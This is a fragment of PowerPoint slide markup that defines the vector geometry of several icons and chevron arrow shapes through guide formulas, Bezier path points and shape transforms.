                <a:gd name="T32" fmla="*/ 119444 w 479"/>
                <a:gd name="T33" fmla="*/ 167110 h 417"/>
                <a:gd name="T34" fmla="*/ 119444 w 479"/>
                <a:gd name="T35" fmla="*/ 127579 h 417"/>
                <a:gd name="T36" fmla="*/ 119444 w 479"/>
                <a:gd name="T37" fmla="*/ 127579 h 417"/>
                <a:gd name="T38" fmla="*/ 95555 w 479"/>
                <a:gd name="T39" fmla="*/ 127579 h 417"/>
                <a:gd name="T40" fmla="*/ 95555 w 479"/>
                <a:gd name="T41" fmla="*/ 60196 h 417"/>
                <a:gd name="T42" fmla="*/ 119444 w 479"/>
                <a:gd name="T43" fmla="*/ 60196 h 417"/>
                <a:gd name="T44" fmla="*/ 119444 w 479"/>
                <a:gd name="T45" fmla="*/ 127579 h 41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79" h="417">
                  <a:moveTo>
                    <a:pt x="478" y="390"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="478" y="390"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="257" y="0"/>
                    <a:pt x="257" y="0"/>
                    <a:pt x="257" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="0"/>
                    <a:pt x="248" y="0"/>
                    <a:pt x="239" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="0"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="221" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="390"/>
                    <a:pt x="0" y="390"/>
                    <a:pt x="0" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="399"/>
                    <a:pt x="0" y="408"/>
                    <a:pt x="0" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="416"/>
                    <a:pt x="8" y="416"/>
                    <a:pt x="17" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="461" y="416"/>
                    <a:pt x="461" y="416"/>
                    <a:pt x="461" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="470" y="416"/>
                    <a:pt x="470" y="416"/>
                    <a:pt x="478" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="478" y="408"/>
                    <a:pt x="478" y="399"/>
                    <a:pt x="478" y="390"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="265" y="372"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="265" y="372"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="372"/>
                    <a:pt x="212" y="372"/>
                    <a:pt x="212" y="372"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="319"/>
                    <a:pt x="212" y="319"/>
                    <a:pt x="212" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="265" y="319"/>
                    <a:pt x="265" y="319"/>
                    <a:pt x="265" y="319"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="265" y="372"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="265" y="284"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="265" y="284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="284"/>
                    <a:pt x="212" y="284"/>
                    <a:pt x="212" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="134"/>
                    <a:pt x="212" y="134"/>
                    <a:pt x="212" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="265" y="134"/>
                    <a:pt x="265" y="134"/>
                    <a:pt x="265" y="134"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="265" y="2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62" name="Freeform 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4E1D79D-E85B-4FA7-B3BC-3F74BCE60A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8823" y="4408782"/>
              <a:ext cx="674413" cy="669374"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 390376 w 256"/>
                <a:gd name="T1" fmla="*/ 357188 h 224"/>
                <a:gd name="T2" fmla="*/ 19199 w 256"/>
                <a:gd name="T3" fmla="*/ 357188 h 224"/>
                <a:gd name="T4" fmla="*/ 0 w 256"/>
                <a:gd name="T5" fmla="*/ 338053 h 224"/>
                <a:gd name="T6" fmla="*/ 0 w 256"/>
                <a:gd name="T7" fmla="*/ 19135 h 224"/>
                <a:gd name="T8" fmla="*/ 19199 w 256"/>
                <a:gd name="T9" fmla="*/ 0 h 224"/>
                <a:gd name="T10" fmla="*/ 390376 w 256"/>
                <a:gd name="T11" fmla="*/ 0 h 224"/>
                <a:gd name="T12" fmla="*/ 409575 w 256"/>
                <a:gd name="T13" fmla="*/ 19135 h 224"/>
                <a:gd name="T14" fmla="*/ 409575 w 256"/>
                <a:gd name="T15" fmla="*/ 338053 h 224"/>
                <a:gd name="T16" fmla="*/ 390376 w 256"/>
                <a:gd name="T17" fmla="*/ 357188 h 224"/>
                <a:gd name="T18" fmla="*/ 38398 w 256"/>
                <a:gd name="T19" fmla="*/ 19135 h 224"/>
                <a:gd name="T20" fmla="*/ 19199 w 256"/>
                <a:gd name="T21" fmla="*/ 38270 h 224"/>
                <a:gd name="T22" fmla="*/ 38398 w 256"/>
                <a:gd name="T23" fmla="*/ 57405 h 224"/>
                <a:gd name="T24" fmla="*/ 57596 w 256"/>
                <a:gd name="T25" fmla="*/ 38270 h 224"/>
                <a:gd name="T26" fmla="*/ 38398 w 256"/>
                <a:gd name="T27" fmla="*/ 19135 h 224"/>
                <a:gd name="T28" fmla="*/ 95994 w 256"/>
                <a:gd name="T29" fmla="*/ 19135 h 224"/>
                <a:gd name="T30" fmla="*/ 76795 w 256"/>
                <a:gd name="T31" fmla="*/ 38270 h 224"/>
                <a:gd name="T32" fmla="*/ 95994 w 256"/>
                <a:gd name="T33" fmla="*/ 57405 h 224"/>
                <a:gd name="T34" fmla="*/ 115193 w 256"/>
                <a:gd name="T35" fmla="*/ 38270 h 224"/>
                <a:gd name="T36" fmla="*/ 95994 w 256"/>
                <a:gd name="T37" fmla="*/ 19135 h 224"/>
                <a:gd name="T38" fmla="*/ 153591 w 256"/>
                <a:gd name="T39" fmla="*/ 19135 h 224"/>
                <a:gd name="T40" fmla="*/ 134392 w 256"/>
                <a:gd name="T41" fmla="*/ 38270 h 224"/>
                <a:gd name="T42" fmla="*/ 153591 w 256"/>
                <a:gd name="T43" fmla="*/ 57405 h 224"/>
                <a:gd name="T44" fmla="*/ 172789 w 256"/>
                <a:gd name="T45" fmla="*/ 38270 h 224"/>
                <a:gd name="T46" fmla="*/ 153591 w 256"/>
                <a:gd name="T47" fmla="*/ 19135 h 224"/>
                <a:gd name="T48" fmla="*/ 390376 w 256"/>
                <a:gd name="T49" fmla="*/ 76540 h 224"/>
                <a:gd name="T50" fmla="*/ 371177 w 256"/>
                <a:gd name="T51" fmla="*/ 76540 h 224"/>
                <a:gd name="T52" fmla="*/ 38398 w 256"/>
                <a:gd name="T53" fmla="*/ 76540 h 224"/>
                <a:gd name="T54" fmla="*/ 19199 w 256"/>
                <a:gd name="T55" fmla="*/ 76540 h 224"/>
                <a:gd name="T56" fmla="*/ 19199 w 256"/>
                <a:gd name="T57" fmla="*/ 338053 h 224"/>
                <a:gd name="T58" fmla="*/ 390376 w 256"/>
                <a:gd name="T59" fmla="*/ 338053 h 224"/>
                <a:gd name="T60" fmla="*/ 390376 w 256"/>
                <a:gd name="T61" fmla="*/ 76540 h 224"/>
                <a:gd name="T62" fmla="*/ 145591 w 256"/>
                <a:gd name="T63" fmla="*/ 151486 h 224"/>
                <a:gd name="T64" fmla="*/ 172789 w 256"/>
                <a:gd name="T65" fmla="*/ 151486 h 224"/>
                <a:gd name="T66" fmla="*/ 204788 w 256"/>
                <a:gd name="T67" fmla="*/ 183378 h 224"/>
                <a:gd name="T68" fmla="*/ 236786 w 256"/>
                <a:gd name="T69" fmla="*/ 151486 h 224"/>
                <a:gd name="T70" fmla="*/ 263984 w 256"/>
                <a:gd name="T71" fmla="*/ 151486 h 224"/>
                <a:gd name="T72" fmla="*/ 263984 w 256"/>
                <a:gd name="T73" fmla="*/ 178594 h 224"/>
                <a:gd name="T74" fmla="*/ 231986 w 256"/>
                <a:gd name="T75" fmla="*/ 210486 h 224"/>
                <a:gd name="T76" fmla="*/ 263984 w 256"/>
                <a:gd name="T77" fmla="*/ 242378 h 224"/>
                <a:gd name="T78" fmla="*/ 263984 w 256"/>
                <a:gd name="T79" fmla="*/ 269486 h 224"/>
                <a:gd name="T80" fmla="*/ 236786 w 256"/>
                <a:gd name="T81" fmla="*/ 269486 h 224"/>
                <a:gd name="T82" fmla="*/ 204788 w 256"/>
                <a:gd name="T83" fmla="*/ 237594 h 224"/>
                <a:gd name="T84" fmla="*/ 172789 w 256"/>
                <a:gd name="T85" fmla="*/ 269486 h 224"/>
                <a:gd name="T86" fmla="*/ 145591 w 256"/>
                <a:gd name="T87" fmla="*/ 269486 h 224"/>
                <a:gd name="T88" fmla="*/ 145591 w 256"/>
                <a:gd name="T89" fmla="*/ 242378 h 224"/>
                <a:gd name="T90" fmla="*/ 177589 w 256"/>
                <a:gd name="T91" fmla="*/ 210486 h 224"/>
                <a:gd name="T92" fmla="*/ 145591 w 256"/>
                <a:gd name="T93" fmla="*/ 178594 h 224"/>
                <a:gd name="T94" fmla="*/ 145591 w 256"/>
                <a:gd name="T95" fmla="*/ 151486 h 22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56" h="224">
                  <a:moveTo>
                    <a:pt x="244" y="224"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="224"/>
                    <a:pt x="12" y="224"/>
                    <a:pt x="12" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="224"/>
                    <a:pt x="0" y="219"/>
                    <a:pt x="0" y="2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51" y="0"/>
                    <a:pt x="256" y="5"/>
                    <a:pt x="256" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="212"/>
                    <a:pt x="256" y="212"/>
                    <a:pt x="256" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="219"/>
                    <a:pt x="251" y="224"/>
                    <a:pt x="244" y="224"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="24" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="12"/>
                    <a:pt x="12" y="17"/>
                    <a:pt x="12" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="31"/>
                    <a:pt x="17" y="36"/>
                    <a:pt x="24" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="36"/>
                    <a:pt x="36" y="31"/>
                    <a:pt x="36" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="17"/>
                    <a:pt x="31" y="12"/>
                    <a:pt x="24" y="12"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="60" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="12"/>
                    <a:pt x="48" y="17"/>
                    <a:pt x="48" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="31"/>
                    <a:pt x="53" y="36"/>
                    <a:pt x="60" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="36"/>
                    <a:pt x="72" y="31"/>
                    <a:pt x="72" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="17"/>
                    <a:pt x="67" y="12"/>
                    <a:pt x="60" y="12"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="96" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="12"/>
                    <a:pt x="84" y="17"/>
                    <a:pt x="84" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="31"/>
                    <a:pt x="89" y="36"/>
                    <a:pt x="96" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="36"/>
                    <a:pt x="108" y="31"/>
                    <a:pt x="108" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="17"/>
                    <a:pt x="103" y="12"/>
                    <a:pt x="96" y="12"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="244" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="48"/>
                    <a:pt x="232" y="48"/>
                    <a:pt x="232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244" y="212"/>
                    <a:pt x="244" y="212"/>
                    <a:pt x="244" y="212"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="244" y="48"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="91" y="95"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="91"/>
                    <a:pt x="104" y="91"/>
                    <a:pt x="108" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="115"/>
                    <a:pt x="128" y="115"/>
                    <a:pt x="128" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="95"/>
                    <a:pt x="148" y="95"/>
                    <a:pt x="148" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="91"/>
                    <a:pt x="160" y="91"/>
                    <a:pt x="165" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="100"/>
                    <a:pt x="169" y="108"/>
                    <a:pt x="165" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="132"/>
                    <a:pt x="145" y="132"/>
                    <a:pt x="145" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="152"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="165" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="156"/>
                    <a:pt x="169" y="164"/>
                    <a:pt x="165" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="173"/>
                    <a:pt x="152" y="173"/>
                    <a:pt x="148" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="149"/>
                    <a:pt x="128" y="149"/>
                    <a:pt x="128" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="169"/>
                    <a:pt x="108" y="169"/>
                    <a:pt x="108" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="173"/>
                    <a:pt x="96" y="173"/>
                    <a:pt x="91" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="164"/>
                    <a:pt x="87" y="156"/>
                    <a:pt x="91" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="132"/>
                    <a:pt x="111" y="132"/>
                    <a:pt x="111" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="112"/>
                    <a:pt x="91" y="112"/>
                    <a:pt x="91" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="108"/>
                    <a:pt x="87" y="100"/>
                    <a:pt x="91" y="9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63" name="Freeform 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B245299E-347A-4C5E-8A1F-EC31E3E47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0823" y="4368191"/>
              <a:ext cx="664761" cy="750557"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115780 w 444"/>
                <a:gd name="T1" fmla="*/ 115121 h 443"/>
                <a:gd name="T2" fmla="*/ 115780 w 444"/>
                <a:gd name="T3" fmla="*/ 115121 h 443"/>
                <a:gd name="T4" fmla="*/ 72081 w 444"/>
                <a:gd name="T5" fmla="*/ 138862 h 443"/>
                <a:gd name="T6" fmla="*/ 27931 w 444"/>
                <a:gd name="T7" fmla="*/ 138862 h 443"/>
                <a:gd name="T8" fmla="*/ 31986 w 444"/>
                <a:gd name="T9" fmla="*/ 182312 h 443"/>
                <a:gd name="T10" fmla="*/ 139657 w 444"/>
                <a:gd name="T11" fmla="*/ 138862 h 443"/>
                <a:gd name="T12" fmla="*/ 187411 w 444"/>
                <a:gd name="T13" fmla="*/ 27324 h 443"/>
                <a:gd name="T14" fmla="*/ 143712 w 444"/>
                <a:gd name="T15" fmla="*/ 23741 h 443"/>
                <a:gd name="T16" fmla="*/ 143712 w 444"/>
                <a:gd name="T17" fmla="*/ 67639 h 443"/>
                <a:gd name="T18" fmla="*/ 115780 w 444"/>
                <a:gd name="T19" fmla="*/ 115121 h 4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4" h="443">
                  <a:moveTo>
                    <a:pt x="257" y="257"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="257" y="257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="292"/>
                    <a:pt x="177" y="327"/>
                    <a:pt x="160" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="283"/>
                    <a:pt x="115" y="265"/>
                    <a:pt x="62" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="354"/>
                    <a:pt x="44" y="389"/>
                    <a:pt x="71" y="407"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="442"/>
                    <a:pt x="204" y="416"/>
                    <a:pt x="310" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="416" y="204"/>
                    <a:pt x="443" y="97"/>
                    <a:pt x="416" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="35"/>
                    <a:pt x="363" y="0"/>
                    <a:pt x="319" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="275" y="106"/>
                    <a:pt x="293" y="123"/>
                    <a:pt x="319" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="167"/>
                    <a:pt x="302" y="212"/>
                    <a:pt x="257" y="25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9127577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 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34E50404-968F-40FD-AB11-D31BE7996CAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302635" y="1032642"/>
            <a:ext cx="2510638" cy="1125843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217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9" name="Freeform 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB47B848-4974-4CB3-ADB0-3DCF9B6F3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3272" y="1036485"/>
            <a:ext cx="7226328" cy="1113570"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 8279 w 9079"/>
              <a:gd name="T1" fmla="*/ 0 h 1784"/>
              <a:gd name="T2" fmla="*/ 9078 w 9079"/>
              <a:gd name="T3" fmla="*/ 892 h 1784"/>
              <a:gd name="T4" fmla="*/ 8279 w 9079"/>
              <a:gd name="T5" fmla="*/ 1783 h 1784"/>
              <a:gd name="T6" fmla="*/ 0 w 9079"/>
              <a:gd name="T7" fmla="*/ 1783 h 1784"/>
              <a:gd name="T8" fmla="*/ 0 w 9079"/>
              <a:gd name="T9" fmla="*/ 0 h 1784"/>
              <a:gd name="T10" fmla="*/ 8279 w 9079"/>
              <a:gd name="T11" fmla="*/ 0 h 17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079" h="1784">
                <a:moveTo>
                  <a:pt x="8279" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9078" y="892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8279" y="1783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8279" y="0"/>
                </a:lnTo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217"/>
            <a:endParaRPr lang="en-US" sz="359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0" name="Freeform 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F1C6224-BC1F-4071-AC42-A453A6F42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5" y="1011448"/>
            <a:ext cx="592944" cy="1138561"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2326"/>
              <a:gd name="T1" fmla="*/ 1783 h 1784"/>
              <a:gd name="T2" fmla="*/ 2325 w 2326"/>
              <a:gd name="T3" fmla="*/ 1783 h 1784"/>
              <a:gd name="T4" fmla="*/ 2325 w 2326"/>
              <a:gd name="T5" fmla="*/ 0 h 1784"/>
              <a:gd name="T6" fmla="*/ 0 w 2326"/>
              <a:gd name="T7" fmla="*/ 0 h 1784"/>
              <a:gd name="T8" fmla="*/ 0 w 2326"/>
              <a:gd name="T9" fmla="*/ 1783 h 17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26" h="1784">
                <a:moveTo>
                  <a:pt x="0" y="1783"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2325" y="1783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2325" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1783"/>
                </a:lnTo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217"/>
            <a:endParaRPr lang="en-US" sz="359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1" name="Freeform 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEDB372F-494A-44C6-BFB6-E9473210A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3070" y="602010"/>
            <a:ext cx="1984943" cy="1366271"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2316"/>
              <a:gd name="T1" fmla="*/ 2140 h 2141"/>
              <a:gd name="T2" fmla="*/ 0 w 2316"/>
              <a:gd name="T3" fmla="*/ 0 h 2141"/>
              <a:gd name="T4" fmla="*/ 2315 w 2316"/>
              <a:gd name="T5" fmla="*/ 0 h 2141"/>
              <a:gd name="T6" fmla="*/ 2315 w 2316"/>
              <a:gd name="T7" fmla="*/ 2140 h 2141"/>
              <a:gd name="T8" fmla="*/ 0 w 2316"/>
              <a:gd name="T9" fmla="*/ 2140 h 2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16" h="2141">
                <a:moveTo>
                  <a:pt x="0" y="2140"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2315" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2315" y="2140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2140"/>
                </a:lnTo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217"/>
            <a:endParaRPr lang="en-US" sz="359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2" name="Freeform 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425A5ABA-62DE-4823-9F1C-E8EB3D24F8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4715" y="1118579"/>
            <a:ext cx="543395" cy="940958"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 453 w 1248"/>
              <a:gd name="T1" fmla="*/ 0 h 1785"/>
              <a:gd name="T2" fmla="*/ 0 w 1248"/>
              <a:gd name="T3" fmla="*/ 0 h 1785"/>
              <a:gd name="T4" fmla="*/ 798 w 1248"/>
              <a:gd name="T5" fmla="*/ 892 h 1785"/>
              <a:gd name="T6" fmla="*/ 0 w 1248"/>
              <a:gd name="T7" fmla="*/ 1784 h 1785"/>
              <a:gd name="T8" fmla="*/ 453 w 1248"/>
              <a:gd name="T9" fmla="*/ 1784 h 1785"/>
              <a:gd name="T10" fmla="*/ 1247 w 1248"/>
              <a:gd name="T11" fmla="*/ 892 h 1785"/>
              <a:gd name="T12" fmla="*/ 453 w 1248"/>
              <a:gd name="T13" fmla="*/ 0 h 1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48" h="1785">
                <a:moveTo>
                  <a:pt x="453" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="798" y="892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453" y="1784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1247" y="892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453" y="0"/>
                </a:lnTo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217"/>
            <a:endParaRPr lang="en-US" sz="359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3" name="Freeform 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2493EFAF-A8B5-419F-A6D7-243134527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6697" y="1118579"/>
            <a:ext cx="547236" cy="940958"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 455 w 1255"/>
              <a:gd name="T1" fmla="*/ 0 h 1785"/>
              <a:gd name="T2" fmla="*/ 0 w 1255"/>
              <a:gd name="T3" fmla="*/ 0 h 1785"/>
              <a:gd name="T4" fmla="*/ 800 w 1255"/>
              <a:gd name="T5" fmla="*/ 892 h 1785"/>
              <a:gd name="T6" fmla="*/ 0 w 1255"/>
              <a:gd name="T7" fmla="*/ 1784 h 1785"/>
              <a:gd name="T8" fmla="*/ 455 w 1255"/>
              <a:gd name="T9" fmla="*/ 1784 h 1785"/>
              <a:gd name="T10" fmla="*/ 1254 w 1255"/>
              <a:gd name="T11" fmla="*/ 892 h 1785"/>
              <a:gd name="T12" fmla="*/ 455 w 1255"/>
              <a:gd name="T13" fmla="*/ 0 h 1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55" h="1785">
                <a:moveTo>
                  <a:pt x="455" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800" y="892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455" y="1784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1254" y="892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455" y="0"/>
                </a:lnTo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217"/>
            <a:endParaRPr lang="en-US" sz="359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4" name="Freeform 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC8D299-DFF7-4DD0-B2D8-4121442AED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52672" y="1118579"/>
            <a:ext cx="543395" cy="940958"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 453 w 1248"/>
              <a:gd name="T1" fmla="*/ 0 h 1785"/>
              <a:gd name="T2" fmla="*/ 0 w 1248"/>
              <a:gd name="T3" fmla="*/ 0 h 1785"/>
              <a:gd name="T4" fmla="*/ 798 w 1248"/>
              <a:gd name="T5" fmla="*/ 892 h 1785"/>
              <a:gd name="T6" fmla="*/ 0 w 1248"/>
              <a:gd name="T7" fmla="*/ 1784 h 1785"/>
              <a:gd name="T8" fmla="*/ 453 w 1248"/>
              <a:gd name="T9" fmla="*/ 1784 h 1785"/>
              <a:gd name="T10" fmla="*/ 1247 w 1248"/>
              <a:gd name="T11" fmla="*/ 892 h 1785"/>
              <a:gd name="T12" fmla="*/ 453 w 1248"/>
              <a:gd name="T13" fmla="*/ 0 h 1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48" h="1785">
                <a:moveTo>
                  <a:pt x="453" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="798" y="892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453" y="1784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1247" y="892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453" y="0"/>
                </a:lnTo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217"/>
            <a:endParaRPr lang="en-US" sz="359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6" name="Freeform 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD4F4EC1-0631-42C8-8153-11530A02C4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0754" y="1967130"/>
            <a:ext cx="193934" cy="247696"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
